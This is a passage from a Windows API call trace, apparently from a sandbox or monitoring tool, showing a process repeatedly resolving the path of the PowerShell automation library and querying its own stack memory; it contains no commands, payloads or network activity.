lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.389] GetLastError () returned 0x0 [0145.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.390] GetLastError () returned 0x0 [0145.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.390] GetLastError () returned 0x0 [0145.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.390] GetLastError () returned 0x0 [0145.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.390] GetLastError () returned 0x0 [0145.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.390] GetLastError () returned 0x0 [0145.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.390] GetLastError () returned 0x0 [0145.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.390] GetLastError () returned 0x0 [0145.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.390] GetLastError () returned 0x0 [0145.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dde90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.390] GetLastError () returned 0x0 [0145.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dde40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.391] GetLastError () returned 0x0 [0145.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dde40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.391] GetLastError () returned 0x0 [0145.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.391] GetLastError () returned 0x0 [0145.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.391] GetLastError () returned 0x0 [0145.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.391] GetLastError () returned 0x0 [0145.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.391] GetLastError () returned 0x0 [0145.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.391] GetLastError () returned 0x0 [0145.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.391] GetLastError () returned 0x0 [0145.392] VirtualQuery (in: lpAddress=0x2dd3e0, lpBuffer=0x2de3e0, dwLength=0x1c | out: lpBuffer=0x2de3e0*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.392] GetLastError () returned 0x0 [0145.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.392] GetLastError () returned 0x0 [0145.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.392] GetLastError () returned 0x0 [0145.392] VirtualQuery (in: lpAddress=0x2dd3e0, lpBuffer=0x2de3e0, dwLength=0x1c | out: lpBuffer=0x2de3e0*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.392] GetLastError () returned 0x0 [0145.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.392] GetLastError () returned 0x0 [0145.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.393] GetLastError () returned 0x0 [0145.393] VirtualQuery (in: lpAddress=0x2dd3e0, lpBuffer=0x2de3e0, dwLength=0x1c | out: lpBuffer=0x2de3e0*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.393] VirtualQuery (in: lpAddress=0x2dd378, lpBuffer=0x2de378, dwLength=0x1c | out: lpBuffer=0x2de378*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.394] VirtualQuery (in: lpAddress=0x2dd3b4, lpBuffer=0x2de3b4, dwLength=0x1c | out: lpBuffer=0x2de3b4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.395] VirtualQuery (in: lpAddress=0x2dd378, lpBuffer=0x2de378, dwLength=0x1c | out: lpBuffer=0x2de378*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.395] VirtualQuery (in: lpAddress=0x2dd3b4, lpBuffer=0x2de3b4, dwLength=0x1c | out: lpBuffer=0x2de3b4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.395] VirtualQuery (in: lpAddress=0x2dd3b4, lpBuffer=0x2de3b4, dwLength=0x1c | out: lpBuffer=0x2de3b4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.395] VirtualQuery (in: lpAddress=0x2dd378, lpBuffer=0x2de378, dwLength=0x1c | out: lpBuffer=0x2de378*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.395] VirtualQuery (in: lpAddress=0x2dd3b4, lpBuffer=0x2de3b4, dwLength=0x1c | out: lpBuffer=0x2de3b4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.395] VirtualQuery (in: lpAddress=0x2dd378, lpBuffer=0x2de378, dwLength=0x1c | out: lpBuffer=0x2de378*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.395] VirtualQuery (in: lpAddress=0x2dd3b4, lpBuffer=0x2de3b4, dwLength=0x1c | out: lpBuffer=0x2de3b4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.396] VirtualQuery (in: lpAddress=0x2dd378, lpBuffer=0x2de378, dwLength=0x1c | out: lpBuffer=0x2de378*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.396] VirtualQuery (in: lpAddress=0x2dd3b4, lpBuffer=0x2de3b4, dwLength=0x1c | out: lpBuffer=0x2de3b4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.396] VirtualQuery (in: lpAddress=0x2dd21c, lpBuffer=0x2de21c, dwLength=0x1c | out: lpBuffer=0x2de21c*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.396] VirtualQuery (in: lpAddress=0x2dd378, lpBuffer=0x2de378, dwLength=0x1c | out: lpBuffer=0x2de378*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.397] VirtualQuery (in: lpAddress=0x2dd3b4, lpBuffer=0x2de3b4, dwLength=0x1c | out: lpBuffer=0x2de3b4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.397] VirtualQuery (in: lpAddress=0x2dd378, lpBuffer=0x2de378, dwLength=0x1c | out: lpBuffer=0x2de378*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.397] VirtualQuery (in: lpAddress=0x2dd3b4, lpBuffer=0x2de3b4, dwLength=0x1c | out: lpBuffer=0x2de3b4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.398] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xf453a18d, Data2=0x4461, Data3=0x4da8, Data4=([0]=0x9f, [1]=0xb6, [2]=0xd6, [3]=0xd4, [4]=0xc4, [5]=0x52, [6]=0xda, [7]=0x34))) returned 0x0 [0145.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dde38, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.398] GetLastError () returned 0x0 [0145.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddde8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.398] GetLastError () returned 0x0 [0145.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddde8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.398] GetLastError () returned 0x0 [0145.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dde38, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.398] GetLastError () returned 0x0 [0145.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddde8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.398] GetLastError () returned 0x0 [0145.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddde8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.398] GetLastError () returned 0x0 [0145.398] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x556bd63b, Data2=0xae0, Data3=0x4ee6, Data4=([0]=0x90, [1]=0x1d, [2]=0x39, [3]=0xb9, [4]=0xd0, [5]=0xee, [6]=0xa, [7]=0xfb))) returned 0x0 [0145.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dde38, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.399] GetLastError () returned 0x0 [0145.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddde8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.399] GetLastError () returned 0x0 [0145.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddde8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.399] GetLastError () returned 0x0 [0145.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dde38, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.399] GetLastError () returned 0x0 [0145.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddde8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.399] GetLastError () returned 0x0 [0145.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddde8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.399] GetLastError () returned 0x0 [0145.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.399] GetLastError () returned 0x0 [0145.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.399] GetLastError () returned 0x0 [0145.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.399] GetLastError () returned 0x0 [0145.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.400] GetLastError () returned 0x0 [0145.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.400] GetLastError () returned 0x0 [0145.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.400] GetLastError () returned 0x0 [0145.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.400] GetLastError () returned 0x0 [0145.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.400] GetLastError () returned 0x0 [0145.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.400] GetLastError () returned 0x0 [0145.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.400] GetLastError () returned 0x0 [0145.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.400] GetLastError () returned 0x0 [0145.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.400] GetLastError () returned 0x0 [0145.400] VirtualQuery (in: lpAddress=0x2dcfd4, lpBuffer=0x2ddfd4, dwLength=0x1c | out: lpBuffer=0x2ddfd4*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 